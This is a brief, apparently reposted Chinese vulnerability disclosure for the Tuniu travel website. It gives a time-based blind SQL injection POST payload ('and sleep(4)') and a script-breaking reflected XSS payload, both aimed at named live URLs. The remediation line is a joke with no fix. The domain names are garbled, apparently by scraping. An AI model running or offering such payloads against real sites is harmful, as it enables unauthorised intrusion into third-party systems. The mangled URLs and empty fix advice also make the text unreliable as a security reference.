blind SQLI
http://menpiao.tuniu测试数据/main.php
POST:do=ticket_index&fn=getHolidayByProvince&province=1400 and sleep(4)
附送XSS
http://HdhCmsTesttuniu测试数据/guide/d-fujian-400/jingdian/?1");alert("I'm");</ScRiPt><ScRiPt>alert("Magic
修复方案:么么哒
查看更多关于途牛旅游网某站盲注及XSS - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13431